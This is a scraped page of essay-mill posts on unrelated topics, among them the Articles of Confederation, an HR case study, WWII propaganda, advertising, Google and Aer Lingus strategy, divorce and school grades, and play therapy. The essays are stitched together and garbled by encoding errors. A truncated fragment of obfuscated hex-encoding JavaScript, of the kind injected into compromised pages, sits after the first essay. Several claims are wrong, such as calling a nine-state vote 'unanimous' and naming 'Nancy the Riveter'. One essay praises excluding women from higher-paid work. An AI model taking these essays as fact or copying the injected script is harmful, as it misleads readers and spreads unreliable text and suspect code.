Monday, September 30, 2019

Articles of Confederation and Articles of Constitution Essay

After the Declaration of Independence, there was a sense among Congressman that they wanted a written document creating a government justifying the existence of the United States. The delegates of the Second Continental Congress were attempting to codify arrangements that had never before put into legal terminology. As a result, in late 1777, the Articles of Confederation, creating a loose â€Å"league of friendship† between the thirteen sovereign or independent colonies, were passed by the Congress and presented to the states for ratification. The Articles created a type of government where the national government derives its powers directly from the states. The Articles was finally ratified by all the thirteen states in March 1781. Although it had its flaws, the government under the Articles of confederation saw the nation through the Revolutionary War. However, once the British surrendered in 1781, and the new nation found itself no longer united by the war effort, the government quickly fell into chaos. The Articles of Confederation was written during the War for Independence and at a time when a strong national government was regarded with suspicion. The Articles created a confederacy where most of the power was vested in the states. The confederation’s most important accomplishment was its resolution of some of the controversies involving the western lands. The Articles provided a national government with a Congress empowered to declare war, make peace, coin money, appoint officers for an army, control the post office, and negotiate treaties with Indian tribes. States were independent and sovereign to govern within its territories. The Congress was unicameral and each state had one vote in the Continental congress, regardless of its size. The vote of nine states out of thirteen was considered a unanimous vote for any amendment. Tariffs were regarded as amendments and therefore almost impossible to pass depriving the national government of needed revenue. Congress functioned as a legislative body to pass laws and executive body to enforce them if needed. Americans had great loyalties to their states and often did not even think of themselves as Americans. This lack of national identity or loyalty in the absence of a war to unite the citizenry fostered a reluctance to give any power to the national government. Congress had no specific power to tax. Articles of Confederation did not allow Congress to regulate commerce among the states or with foreign nations. The Articles of Confederation had no provision for judicial system to handle the growing number of economic conflicts and boundary disputes among the individual states. The failure of the Congress to muster an army to put down the Shays’s Rebellion provided a dramatic example of the weakness inherent in the Articles of Confederation and shocked the nation’s leaders into recognizing the new national government’s inadequacies. And, it finally prompted several state delegates to meet in Annapolis, Maryland in 1786 to call for a convention in Philadelphia in may of 1787 for the sole and express purpose of revising the Articles of Confederation. On the first day of convention , Edmund Randolph and James Madison of Virginia proposed the Virginia Plan. Many delegates, including William Patterson of New Jersey, considered these resolution’s to be in violation of the convention’s charter, and proposed the New Jersey Plan, which took greater steps to preserve the Articles. These proposals met the heated debate on the convention’s floor. Eventually the Virginia Plan triumphed following a declaration from Randolph that, â€Å"When the salvation of the Republic is at stake, it would be treason not to propose what we found necessary.† Though the basic structure of the new government was established, the work was not complete. These differences were resolved through a series of compromises. The Great Compromise, proposed by Roger Sherman of Connecticut made a way for the Bicameral legislature in the constitution. Lower House or the House of Representatives consisted representation based on population, which would have the power to originate all bills for raising and spending money. Whereas the Upper House or Senate had equal representation, two senators from each state. The national government would have the supreme power. The Three-fifths Compromise determined that slaves would be counted as 3/5s on 1 for the purposes of taxation and representation in the House of Representatives. Commerce and Slave Trade Compromise decided that the slave trade would be abolished in 20 years.(i.e. January 1808). It also gave Congress, the power to regulate commerce including interstate commerce or trade between states and also to enact tariffs by a simple majority. The first three articles established three branches of government. The legislative branch; Article I vests all legislative powers in the congress and establishes a bicameral legislature, consisting of Senate and the House of Representatives. The Executive Branch; Article II vests the authority to execute the laws of the nation, in a president of the United States. The Judicial Branch; Article III establishes a Supreme Court and defines its jurisdiction. The four remaining articles define the relationship among the states, declare national law to be supreme and set out methods of amending constitution. Three-fourths of the state vote would be required for any amendment. Only the national government would have power to coin money. Taxes were laid and collected by congress instead of the states in Confederation. Once the Constitution was approved by the convention, the next step was ratification by the states. The framers required the states to call special ratifying conventions for the purpose of ratifying or rejecting the proposed constitution. Those who favored new strong government chose to call themselves Federalists. On the other hand, Anti-Federalists argued that they simply wanted to protect state governments from the tyranny of a too powerful national government. Between October 1787 and May 1788, a series of eighty-five essays written by Alexander Hamilton, James Madison, and John Jay appeared in newspapers in New York, a state where ratification was in doubt. These essays written in support of ratification of the U.S. Constitution became known as â€Å"The Federalist Papers†. Aside from diminishing the power of the states, the main objection from the Anti-Federalists appeared to be the lack of written protection of individual rights and liberties. Once, the constitution was ratified, the elected congress immediately sent a set of ten amendments, known as â€Å"Bill of Rights† to states for their ratification. They offered a numerous specific limitations on the national government’s ability to interfere with a wide variety of personal liberties, some of which were already guaranteed by many state constitutions. These include freedom of expression, speech, press, religion, and assembly guaranteed by the first amendment. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=†Ã¢â‚¬ ,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return ""},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Sunday, September 29, 2019

HR strategy analysis: Smith Radiators, inc Essay

Smith Radiators, Inc. is undoubtedly one of the major players in the automobile industry, being a supplier of radiators to some major automobile suppliers. In fact, it supplies fifteen percent of the Auto of America, Inc. (AAI) demand for radiators in 1991, competing with five other major suppliers and some minor suppliers. On the side of Smith Radiators, AAI is their major customer. About thirty three million dollars of its sales during the early 90’s came from its partnership with AAI. Thus, Smith Radiators must take good care of the business partnership with AAI to maintain or further improve its financial stability. And this could be done if Smith Radiators could sustain and further improve the quality of its products and services. But a more challenging task appeared before Smith Radiators on April 20, 1991. AAI demands a major change to its company. Smith Radiators, being a partner of AAI for thirty years, is obviously affected by this. Due to recession, AAI decided to do some cost reduction but with sustainable quality improvement on its products and services and effective response to its customer needs. AAI will be shifting from its traditional way of purchasing supplies to the so-called just-in-time basis or the JIT. Some major changes using the JIT philosophy would be streamlined purchasing operations and few certified suppliers. On the part of Smith Radiators, this needs immediate attention. It cannot afford to lose its major customer. The president of Smith Radiators called for an emergency meeting with the company’s department heads to address the demands of AAI. Being a company that does not practice JIT that time, the president assumed that problems will arise upon adapting JIT onto their functional areas. Vice-presidents were asked to identify these problems. One of the vital areas to be taken in consideration is the workforce or the labor force. This is under the Human Resource Department. JIT would definitely affect the workforce. Currently, the recruitment process adapted by Smith Radiation is done by the so-called internal recruitment, wherein a prospective candidate will be recommended by a current employee. The candidates will undergo try-outs and interviews, and the successful candidates will be undergoing informal training with fellow workers and under the supervision of a foreman. The workers participate on this recruitment strategy because they earn some extra money if their recruits are accepted and could be able to work for two years in the company. With JIT, that would be a much different thing. The workers of Smith Radiators, like workers of other companies, also have their union. The union serves as the unified voice of the workers that answers, accepts, or contradicts issues that directly affect them. Even before the proposed JIT, the union has several conflicts with the management. The workers’ wage is in fact much lower relative to those working for competing companies. It is saddening that the workers agreed for this low wage for the sake of job security, which is a responsibility of the management. The management of Smith Radiators obviously takes advantage of this situation. They were able to save on their labor cost. On the other side, the job security is what’s important here, considering that most of the workers were high school drop-outs. Another issue is that women were not allowed to work in some of the areas, like those areas that use lead-based chemicals, where higher wage is given for the service. In my point of view, it is just right to ban women in this particular work, because their health will be at risk. This ban, I must say, is a commendable action of the Smith Radiators’ management. But the major concern of the union is that the company is overstaffed by twenty percent, and by the end of 1991, end of the workers’ contract, some of them might be laid off. As a result, workers were dissatisfied with their work. In fact, absenteeism became a habit to some or maybe majority of the workers. Considering all these issues or conflicts between the management and the workforce, it is expected that the vice-president for human resource spends most of his time dealing with the union’s concern, when in fact; some of his times could be used for brainstorming, structuring activities that could improve the working attitude and discipline among the workers. With the need to comply with the demand of AAI, Smith Radiation needs to do some changes especially on its management strategy. The goal is to get a certification to operate as AAI supplier, adapting JIT philosophy in their workplace. JIT depends on elimination of waste, total quality control, supplier participation, and employee’s participation on decision makings. The expected result of JIT would be shorter lead time in production, flexible manufacturing, reduced inventory, higher quality of products, and increased productivity. To be certified, four criteria must be met by Smith Radiation. First: quality of supplied parts. On the current system of Smith Radiators, considering the fact that the company does not provide formal training to their new worker, low quality of products will be produced. Generally, the company currently follows the defender type of strategy, wherein it stays in its comfort zones. Research shows that training and development are guaranteed to be needed at some point of the strategic growth process. And the current human resource department seems to overlook this aspect. But I appreciate the fact that the vice-president for human resource communicates with human resource officers from other companies that were able to practice JIT philosophy already. This is a good start. Smith Radiations could learn from the experiences of other companies and use these experiences as baseline for starting JIT. Second: frequent delivery. The AAI demands that two times per day will be the transfer of products from Smith Radiators. The vice-president for human resource might realize that he needs to train the workers work flexibly. Meaning, he must be multi-tasking for him to respond to sudden changes in the production schedule. This would be an effective move by Smith Radiators, wherein they could save from their labor cost, contrary to the current management practice where a worker is skilled only with a specific type of work. However, on the part of the workers, some of them might be laid off. The management may consider retaining only the most productive workers, and in return, providing them with better wages and development programs. But the good thing is that workers will be challenged to do better to retain their position. Third: reliability of delivery. Quality must come first. In JIT, the human resource department will train the workers to perform during critical decision makings. The worker must be able to inspect his own work. For example, during a process, if the worker sees that the product is out of specification, he can stop the whole process. And this could only be possible if the worker is fully knowledgeable with the basic technicalities of the process. On the part of the worker, this is a good opportunity not only to obtain a higher wage but opportunity to explore new knowledge and opportunity to practice responsibility. In addition to this quality issue and reliable delivery, the management, imploring JIT philosophy, discussions in round table as strategized by the vice-president of human resource is actually an effective way to obtain new ideas. This would be a perfect venue for the workers to communicate with their co-workers, supervisors, and if possible with the managers. These workers are the actual people that experience the process. They could have better ideas to explore changes in processes without sacrificing the quality of the products. The supervisor’s or foreman’s role on this part of the strategy would be to confirm the suggestions of the workers using scientific trials and experiments. Fourth: number of shipments received in exact quantities. Workers being multi-skilled, self-disciplined, group-oriented, and has good quantitative and diagnostic skills, there would be no doubt that Smith Radiators can comply with the demanded two shipments per day at ten radiators per shipment. Over-all, the strategy that is proposed by the vice-president for human resource comply with the goals of the company and supports the business strategy, the prospector business strategy, which aims to obtain certification, and in the long run, sustain its business partnership with AAI. The company, however, is expected to provide job security, fair wage, and respect to the workers. In essence, a strategy made by the human resource department must capture the â€Å"people element,† as it is called by an article in a reliable website, of what is intended to be achieved in the medium to a long run by an organization. According to Richard Chang, author of The Passion Plan at Work, HRM focuses mainly on HR Research and Information Systems, Union/Labor Relations, Employee Assistance, and Employee Compensation/Benefits. In the case of the Smith Radiators, the human resource department did a very great job!

Saturday, September 28, 2019

American History - 9 Essay Example | Topics and Well Written Essays - 1250 words - 1

American History - 9 - Essay Example fact that this extra labor was a necessity and had to be provided from somewhere; hence, it was logical to turn to women in order to accomplish this task. Although there exist many images within the mind of the American history student with regards to the level and effect of this mobilization, one thing that should be carefully noted the fact that many of the jobs that have been typified and stereotyped with regards to women like Nancy the Riveter and others were more or less rare. Rather than such situations being the norm they were the exception. However, such a fact does not seek to delegitimize the fact that women participated heavily in sectors of production and the economy that they previously had not. This led to many things both before during and after the war’s conclusion. One of these was the fact that for the first time in American history women were able to actively pursue work outside the home as a means of both developing their horizons and pursuing a career. Although the topic of wartime propaganda has often been discussed in history courses and in society as a function of how governments seek to establish the idea of the â€Å"enemy† in the minds of their populace, the way in which segment 24-7 brought home the realization that the wartime machine actively sought to portray the Japanese (and to a lesser extent the Germans) as subhuman rapists and animals was especially striking. As such, equally captivating was the fact that topics as unrelated as venereal disease could be related somehow to the Axis Powers. In this way the populace can quickly form a strong and lasting link between every negative aspect of the current world and seek to attribute this in some way to â€Å"the enemy†. Although a great deal of academic ink has been expended in seeking to understand how Nazi Germany performed a similar effect within its own populace with relation to seeking to ascribe all of society’s ills upon the Jewish populations of Europe, fairly little

Friday, September 27, 2019

Advertisements Based on Fear Mongering Essay Example | Topics and Well Written Essays - 1500 words

Advertisements Based on Fear Mongering - Essay Example Recently advertisers have also started using ‘fear’ for selling products. Fear is an emotion that led people to make emotional choices. For instance, disinfectant advertisements showing the harmful effects bacteria may cause to humans (Tyagi & Kumar, 2004). The fear phenomenon works wonders. People get afraid of some things, or conditions get easily directed to buy the advertised products instead of getting inspired by the qualities only. Such advertising is also known as ‘shockvertising’ (Wells et al., 2011). On the other hand, the other method of advertising is by using ‘flattery’. Sometimes advertisers flatter the viewers by appreciating their choices, thoughts and notions on particular matters and then introduce the products that complement the viewers and provoke them for buying the advertised products (Armstrong, 2010). Either fear or flattery, both has found to be very effective depending on the type of the product and theme of the advert isement. In order to present the products or services to the audiences the advertisers select a suitable theme and based on it a narrative is written. The advertisement is filmed by using techniques of mise-en-scene, sound and editing to focus on highlighting the product feature to appeal maximum customers and meet the ultimate goal that is to raise the sales of the product. In this paper the Coca-Cola recent advertisement ‘Holidays are Coming’ will be analyzed based on the techniques (mise en scene, sound, editing and narrative) used in the advertisement (Coca-Cola Company, 2014). Coca-Cola rejoiced its customers by launching its classic ‘Holidays are Coming’ TV advertisement in order to celebrate Christmas (Coca Cola, 2014). The advertisement shows how seeing the huge sparkling Coca-Cola truck on the streets of their towns excites people. The commercial created hype for people of all ages including children, youth and adults as they would be a part of the campaign  when the truck would come to their towns and cities. The marketing director of Coca-Cola (UK) Zoe Howorth described the advertisement strategy as, â€Å"Coca-Cola has been spreading happiness in people on the Christmas event since long through its vibrant campaigns and Holidays are coming to the advertisement.  

Thursday, September 26, 2019

GOOGLE STRATEGIC MANAGEMENT Essay Example | Topics and Well Written Essays - 2000 words

GOOGLE STRATEGIC MANAGEMENT - Essay Example But in line with this selection, a comprehensive tool vested in the use of a VIRO analysis is implemented in critically evaluating the credibility of the selected option for the company. The VIRO analysis will be simplified in a manner that takes four major independent variables, which are tested against four other dependent variables. The independent variables are given as financial resources, human resources, material resources, and nonmaterial resources. Each of these will be tested against value, rareness, imitability, and organization in place at Google Inc. The cost Leadership Option Generally, the cost leadership option is in place to ensure that the company gains competitive advantage by taking consumers away from competitors and bringing them to the side of Google Inc. To effectively do this, there are two major approaches for the company to follow. In the first instance, there is the need to increase market share by reducing prices (Horkheimer and Theodor, 2007). This may s ound as an irony as a pair of objectives that cannot be achieved hand in hand. But from a very technical viewpoint, it is possible to both reduce prices and increase market share by using the cost leadership option (Lessig, 2009). ... This is because it has already been established that when there is increase in revenue, there must be a corresponding reduction in expenditure to make profitability possible. Meanwhile, the cost of production accounts for one of the highest sources of expenditure for most companies, of which Google Inc. is not exception (Barthes, 2008). Since 2004, Google’s cost of production has been said to be going up steadily especially as the company started engaging in a number of divestitures that are aimed at increasing the revenue pool of the company. To effectively use the cost leadership option, the company must be prepared to focus attention on the need to reduce most of its identified cost, especially internal costs that bring about cost sharing situations (Althusser, 2011). This way, it will be possible to produce goods and services at a much reduced cost, which will ensure that even if prices are charged at all-time low, market share will not be affected. Using VIRO Analysis to analyze the Cost Leadership Option Having identified the cost leadership option as the most viable option for Google, this section of the paper uses the VIRO analysis to critically break the option down into four major business constituents of Google Inc. these four constituents are financial resources, material resources, nonmaterial resources and human resources. Each of these four constituents shall be analysed using the four acronyms of VIRO, which are value, imitation, rareness and organisation. Financial Resources As far as the value of Google’s financial resources are concerned, one major question is posed. This is the question of how expensive the financial resource is (Gramsci, 2007). It would be established that Google is one of the most fortunate global IT companies that has a

Wednesday, September 25, 2019

The Environment and Technology in Feed (responses) Assignment

The Environment and Technology in Feed (responses) - Assignment Example However, on the other, it is causes serious environmental problems such as the destruction of Jefferson Park. When more artificial elements are incorporated into life, the natural elements are apparently forced out. Therefore, Feed just like every other dystopian piece of literature shows how the future might end in apocalypse if necessary actions are not taken immediately. It shows how government uses technology to literally control the minds of people, thus, the story serves as a gentle reminder to make young readers see beyond the truth shown to them. The Teen Ink article as well as the Colson Article provide in depth information regarding the genre of YA dystopia and further exemplify how the genre has shifted throughout time. The latter furthermore identifies that it is the â€Å"courage and vision to begin anew† portrayed through stories of this genre that make it so popular among modern day teens (Colson 2012). Hope is identified as the â€Å"most powerful emotion† in YA dystopia, however, in Feed, Anderson does not seem to portray it too much, as in the end, the rebellious Violet dies and throughout the story her thoughts are always dismissed and no one listens to her (Teen Ink 2014). I completely agree with the plot and themes presented in the novel, however, I believe that Anderson could have inclined a bit more towards hope rather than truth so that his readers could end with a better note of â€Å"uplifting sense of triumph†

Tuesday, September 24, 2019

Excercise programs, Personal training, nutrition, Assignment

Excercise programs, Personal training, nutrition, - Assignment Example 20). As the client has expressed that they are a beginning when it comes to weight training, a series of stages have been designed as a means of aiding the client. The first stage of the exercise routine involves machine weights. Specifically, it is recommended that the client implement fully body circuit training three times per week. In terms of repetitions, implementing 10-12 repetitions on each machine at a steady rate is recognized to increase muscle capacity. The following stage of this program will then involve upper body and lower body splits of free weights. Compound exercises with 10-12 repetitions each can then be implemented 4 times per week. The compound exercise split will implement pull-ups, deadlifts, and chest presses will be implemented to target back, arm, chest and core muscles. There will be a one-day rest period and then lower body exercises will be implemented. The lower body exercises will primarily focus on squats with the barbell, but will also involve squat ting without the barbell. Both the lower body and upper body exercises will be implemented 3X each with 10-12 repetitions. The ultimate recognition is that these exercises will create the necessary muscle to reduce body fat and tone. There are a number of areas of consideration that I implement when creating an effective programme for a client. One of the prominent areas of concern is upper-body and lower body alterations. The upper body and lower body split is effective in that it is largely simplistic and does not require clients to consider complex muscle groups in implementation. Another prominent consideration involves resistance training, strength training, hypertrophy, and endurance training. The main consideration in these regards is in terms of repetitions. The implementation of lower repetitions at higher weights results generally in an increase in muscle bulk. This is contrasted with higher

Monday, September 23, 2019

Aer Lingus Products and Target Market Segments Essay

Aer Lingus Products and Target Market Segments - Essay Example Aer Lingus is one of the reputable fleet carrier companies in Ireland. With the low cost model and one way fares, Aer Lingus brand has become most talked about brand in fleet services. On October 22, 2006, Aer Lingus entered into a new phage of business as it realized nearly 400 million Euros through Irish and London Stock Exchange. Most of the Aer Lingus passenger revenue will be generated from its website As per the latest records, nearly 81 percent of total passenger revenue was generated from the website. The effective marketing strategies for products as well as services help company to achieve great heights. With the low cost air fleet charges, Aer Lingus has become a competitor for Ryan air. Aer Lingus has celebrated its 75th birthday in May 2001. With 1,215 million revenues in 2010, Aer Lingus is planning to push forward with wide range of products and services in the market. 2009 was a difficult year for Aer Lingus as it witnessed nearly 93 million Euros loss. To turnaround the company, Aer Lingus has come up with several strategies such as better matching of capacity to demand, connectivity improvements with in the network as well as partner’s network and partnerships.... 2009 was a difficult year for Aer Lingus as it witnessed nearly 93 million Euros loss. To turnaround the company, Aer Lingus has come up with several strategies such as better matching of capacity to demand, connectivity improvements with in the network as well as partner’s network and partnerships. Aer Lingus products are considered to be the cheaper products when compared to its competitor’s products. Though, companies like Ryanair offer much cheaper products than Aer Lingus, the customers would love to travel by Aer Lingus because of great service. Aer Lingus offers both Cabin Services as well as Auxiliary services. Cabin Services include a two class business and economy service on long-haul routes and a single class economy service for all short-haul routes. Auxiliary Services include In-flight sales merchandise, car rental sales, hotel accommodations and commission from online currency conversion. Literature Review According to Philip Kotler, Marketing is the proce ss of offering suitable product to customer. Everything comes to one equation; right product at right place at right price to the right customer (Philip Kotler). Marketing has become one of the most focused areas for any company in the world. Be it is a small scale internet based company or a large scale manufacturing company; without proper marketing, the survival would be a big question mark. According to Neil Borden, marketing department of any company should primarily focus on 4Ps. They are Price, Product, Promotion and Place. The 4Ps are also called as Marketing Mix (Neil Borden 1953). 4P mix is majorly used when you are trying to market a product, which customers can touch and feel. When focusing on the services, the marketing mix would be changed slightly. It

Sunday, September 22, 2019

That which can be asserted without evidence can be dismissed without Essay

That which can be asserted without evidence can be dismissed without evidence (Christopher Hitchens). Do you agree - Essay Example They tried to prove that the correspondence truth is unknowable or unthinkable as it would call for comparison between cognition with its uncognized object which would be impossible (Net Industries, 2012). Moreover, Peire, the American Pragmatist proposed that the only way a concept can be indentified is from its practical effects of its objects. This implies that when this proposal is applied to definition of truth, a belief can only be true so far as it satisfies practicality of its objects. The fact that truth can only be sustained through inquiry implies that for truth to be indentified there has to be evidence to support such truth, which has to be practical and verifiable. However, knowledge can be attributed as evidence: to the extent that such known concept is true, inconsistency with the knowledge of an individual would amount to inconsistencies with some form of truth (Kelly, 2006). This applies to both normative and indicative evidence. Stating that smoke is the evidence o f fire implies that whenever smoke is sighted there must be presence of fire. Therefore, Hirtchens assertion â€Å"that which can be asserted without evidence can be dismissed without evidence† is true in justifying the truth. Kelly (2006) defines evidence to be the kind of thing which makes a difference in what one has justifications in believing, or what is perceived to be reasonable for one to believe. Therefore, one’s justification in believing is barely a matter which can be traced to one’s evidence (Kelly, 2006). This implies that two individuals with the same types of evidence would be exactly the same according to what they are justified in believing regarding a particular issue. Therefore, the main question is if believing requires evidence, and whether the object believed can be proved beyond any doubt regarding its identity and hence truth. According to Dunwoody (2009), belief is matter of judgment and decision making. Evidence is more related to fact s; evidence leads to justification in believing something as the truth. However, a fact is by itself subjective in nature as one has individual evidence to believe in a particular object, which to them represents the truth. Schmitt (2004) explains that to apprehend a fact by itself is an act of judgment and perception; this is directly related to the belief held by a particular individual. Therefore, facts which would amount to evidence that can sustain inquiry is also a belief as nothing is knowable in the world; everything is mediated by an individual’s senses and it is only a representation of objects in the world. Therefore beliefs are constructions of individual’s evidence and lead to construction of truth through consistency of these beliefs (Schmitt, 2004). Therefore, to establish the truth there are definite evidences required to support such beliefs, implying that evidence is critical in attaining any truth. According to James (1907) the truth of an idea is fa r from the stagnant property inherent within the idea, but truth happens to an idea. In other words, and idea is made true by events through a process which an idea verifies itself. The process of making an idea to be true is composed of a series of evidences, which justifies the truth in such an idea. Therefore, the fact that people seek evidence to believe or to assert the truth of a specific idea is thus correct; truth is verified through a process and by events, which constitutes a series of evide

Saturday, September 21, 2019

Divorce Research Paper Essay Example for Free

Divorce Research Paper Essay Pondering question to get reader thinking about topic II. What the problem is d. â€Å"Children do not fall behind their peers in these areas during the potentially disruptive period before their parents divorce, the study revealed. Instead, its after the split that kids seem to have the most trouble coping. Include this from Healthday reporter Alan mozes e. What the child feels, they feel its their fault and makes them more upset III. Statistics f. What classes children with divorced parents are struggling in g. Average grades for the kids h. What it does to teens IV. My personal experience i. How my grades were before and after j. What classes I was struggling in k. My personal feelings about it V. Conclusion l. Say how parents really need to think about how it will affect their child before going through with it. m. My views on the statistics and why it is valid info n. Opinion about parents being more involved in children’s schoolwork. Christian Startt Mrs. Pantusa English 1 A. P Prep April 26, 2013 Divorce and How It Affects Children Introduction Divorce can be the most inconvenient and hardest long-term problem of a child’s life, affecting all parts of his or her life all because of the parent’s failing marriage. 41% of first marriages end in divorce (Irvin, M), which is a substantial percentage of marriage that has not followed through with their vows and left their kid’s normality in the dust. Grades, emotions, and innocence all are changed in the process of the divorce, as well as a new set of challenge and problems these kids have to face in everyday life. Divorce isn’t just a split between a family, it’s more of a life changer. â€Å"As soon as me and my wife Terri divorced†, explains Chris Startt, â€Å"basic life changed heavily. Laundry, cooking dinner everyday, and constantly worrying about my son’s grades has really kept me busy and stressed†. I asked Chris how his son’s grades were after his divorce. â€Å"When me and my ex were still together, Christian’s grades were outstanding, strait A’s. But later (a year passes) his grades went from strait A’s to B’s and C’s later on in middle school†. According to Healthday reporter Alan Mozes, â€Å"Children do not fall behind their peers in these areas during the potentially disruptive period before their parents divorce, the study revealed. Instead, its after the split that kids seem to have the most trouble coping†. Research suggests that the odds of a divorce occurring in a household before the children become grown rest at about 50% (Ahilburg and DeVita, 1992), with divorce rates beginning to soar in 1963 (Jeynes, 1999). A 60-year literature review of 347 experimental studies confirmed that many studies have concluded that divorce has negative consequences for childrens academic achievement (Kunz, 1992). Most research shows that the child’s math scores were the ones that were mostly affected. â€Å"Kim found that while a divorce is in progress, first, second and third-graders experience a dip in math test scores — a decline that holds steady once the divorce is final†. (Mozes) But, at the same time reading scores didn’t really seem to be changing, as research from (Mozes) shows that â€Å"†¦however, Kim found that reading scores remain unaffected†. When my parents divorced, about 6 years ago, I was 9 years old in 3rd grade and that’s when my grades went from strait A’s, to A’s and B’s, and then a C here and there. Mathematics really begun to get more and more difficult to concentrate to and the tests were getting harder to understand. Reading, however, was my strength in elementary school, and it remained un-affected after my parents divorce. Researcher Hyun Sik Kim explains, Reading is not that cumulative. But with math, you must understand previous things to develop. For example, if I do not understand that one plus one is two, then I cannot understand multiplication. Divorce really puts a child’s mind in motion. After the divorce the child may feel like it was his/her fault, causing stress and emotional problems. By this happening, the child will become more stressed by the moving between houses, therefor making it harder to concentrate on schoolwork and thus grades beginning to lower. My personal experiences also help support my argument. Divorce should be decided with caution; you have to think about how its going to affect your child and how its going to affect their future.

Friday, September 20, 2019

Play Therapy Theories Children And Young People Essay

Play Therapy Theories Children And Young People Essay Play is important for the childs holistic development including their physical, language, social, emotional and cognitive development. Play allows children to learn naturally from the world around them to gain life skills and understanding Play allows children to freely explore the world around them, without adult direction. Play allows the child to create, challenge, imagine, engage and explore satisfying activities for both themselves and others. Children may use equipment; play alone or with others, in energetic or calm manner. Play is a vital component for a childs development and lives and is essential to be promoted where possible (Play England, 2007). Play is the primary and natural medium of communication for children (Axline, 1947). Children may not have the capacity to use words to express themselves, but with the assistance of play therapists, communication and understanding can occur between both the child and therapist. As children do not have the same abilities to communicate and express themselves verbally and as effectively as an adult can, play gives children the opportunity to express their emotions and experiences. This can provide a foundation to build relationships with the play therapist and others, allowing their needs and requirements to be known and to gain a better understanding of themselves (Landreth, 2002). Play therapy then, is a medium of therapy in which play is used, to observe children engaging in play. By providing resources of play materials and knowledge of theory around play therapy, therapists can identify and examine the childs underlying issues. Wilson Ryan, (2005) state that the importance of play therapy is to allow children move from being unaware of their hidden, unconscious feelings they may have as a result of life experiences, and gain an understanding of their emotions and experiences enabling them to come to terms with feelings. OConnor and Schaefer (1994) maintain the aim of play therapy is to bring children to a level of emotional and social functioning or level with their developmental stage. This can allow usual developmental process to be resumed. Play Therapy is an active process between both the play therapist and the child. It allows the child to explore their surroundings at his or her own pace. The child has his or her own schema of their issues which may be current and of conscious awareness or, hidden in the past and possibly buried in the unconscious. These issues whether of conscious awareness or not may affect the childs daily lifestyle influencing feelings and behaviour. Play therapy is child centred and the play therapist focuses on play as the first and paramount medium of therapy, with speech the second medium of therapy (British Association of Play Therapists, 2008). The Irish Play Therapy Association (2013) claim, Play Therapy is an effective method of therapy for children who display or encounter many difficulties or issues. Behavioural difficulties may include depression, aggression, anxiety and other issues relating to difficult encounters or life experiences of abuse, death of a family member, divorce or separation and trauma (, 2013). A history of Play Therapy Play Therapy dates back as far as 1909 in Europe with the work of Sigmund Freud (1909/1955) and the first documented psychoanalytic therapeutic work focusing on a child was the case of Little Hans. Freud discovered the childs phobias through observations of his play behaviours and dreams. This case encouraged further development of Freuds work and eventually the development of play therapy. While Freud used interpretation of the unconscious motivation of a child building a relationship with the child, but he came to the understanding that unlike adults, children do not decide to enter into psychoanalysis. Without consent or understanding the therapist brings the child into this analysis. Anna Freud (1946) followed her fathers interest of play, but developed her own theories. She held that adults undergoing psychoanalysis are required to provide the therapist with information to assist the session, however with children the background information is expressed usually, but not always by the parent. Melanie Klein (1955) believed the use of psychoanalysis could benefit children in a variety of ways, even if their development was atypical. Klein also believed in using observations with children during their play and behavioural actions and not through their expression of speech as is used within adult psychoanalysis. Klein therefore introduced toys into her sessions to promote play and allow observation of actions to occur. Virginia Axline working in America was influenced by Carl Rogers work on non- directive client centred psychotherapy. Therefore, Axline built on Rogers theory resulting in a new therapeutic approach for working alongside children, known as non directive play therapy. As in adult psychotherapy, the relationship between the therapist and the child in play therapy is based on being genuine, on acceptance and trust. The theory is that if children are given the opportunity to freely express their feelings and emotions they will resolve these issues themselves, using play experiences and the assistance of their play therapist in order to achieve this (Wilson Ryan, 2005). Axline (1950) stated that non- directive play therapy is a play experience that is therapeutic because it provides a secure relationship between the child and the adult, so that the child has the freedom and room to state himself in his own terms, exactly as he is at that moment in this own way and in his own time (p. 68). Axline based her theory on her work with a young boy called Dibs. Axline held that Dibs healed himself through no direction over a period of time. She said No-one ever knows as much about a human beings inner world as the individual himself. Responsible freedom grows and develops from inside the person. (Wilson Ryan, 2005). Axline, unlike Freud and Klein who both focused primarily on psychoanalysis, believed children would do their best to meet their full potential and by providing a therapeutic relationship and approach which would support that development. Many therapists today base their work on Axlines (1947) eight principle guidelines Axlines principles outline, The importance of developing a relationship between the therapist and client from the beginning. Accepting the child and who they are without judgement. Provide the child with a safe environment to express their feelings completely. The therapist is alert and available to provide the child with feedback to assist the clients behaviour, The therapists provides the child with a scaffold to learn how to cope and solve their own problems and to respect their choices. The therapist is required not to direct the child in any manner, unless where the childs safety is at risk. The therapist allows the child to lead the session and the therapist follows their lead. The therapist is patient and understands it is a gradual process requiring time. The therapist provides limits that are essential to assist the therapy into a sense of reality and provide the client with information in relation to their responsibilities within the relationship (Axline, 1947). Based on Axlines theory of non-directive play therapy, Landreth (2002) developed his theory of Child Centred Play Therapy. Landreth (2002) states the relationship between the child and the therapist must be different from other types of relationships the child has experienced. The relationship between the two is to ensure the child feels safe and comfortable to be expressive within their play, allowing natural communication to occur. He believes the true foundation to the relationship within child centred therapy is that of the bond between the therapist and child (Landreth 2002). Another influential contribution to the area of play therapy is the work of David Levy (1938). Levys Release Therapy allows children release their anxieties through controlled play set out by the therapist. Levy provided free play therapy based on Kleins theory of free play. Toys are introduced into the settings that are related to the event that requires intervention and the child plays freely with the chosen toys. Growth of Play Therapy Child psychotherapy has established a strong tradition across Europe and has grown significantly. In Ireland, child psychotherapy has grown more slowly in comparison to American and Europe. However, professionals interest in play as a therapeutic intervention has developed gradually over the past decade. Practioners are becoming more increasingly aware of the seriousness of emotional issues experienced by children and the difficulties that may arise. These children are likely to require more serious treatment that may not be available to them. Play Therapy Theories and Approaches There are two techniques used within Play Therapy, non- directive Play Therapy and Directive Play Therapy. Non directive play therapy approaches are referred to as , child-focused, client centred and unstructured, where components of directive play therapy are described as structured, directive and focused Gil (1994). Gil (1994), elaborates on various directive play techniques, including behavioural or gestalt, but suggests that non directive play therapy is a more child focused approach. He explains that non-directive play therapy provides the child the freedom to participate in their own way throughout the session, allowing the therapy to move in specific direction required for the session. Within structured play therapy, the play therapist plans activities adapting a directive play approach. During the formation of a relationship between the therapist and client within directive Play Therapy a less directive technique is used. This allows the therapist to build a foundation to the relationship and over time, directive techniques are weaned into the relationship (Jones, Casado and Robinson, 2003). Similarly, supporting this concept, Berting (2009) suggests that building on the concept on developing a therapeutic relationship using a less directive approach is best practice, before proceeding with more directive activities in the core area of the play therapy session. He also suggests observing the childs need to be able to or prepared to carry out directive play 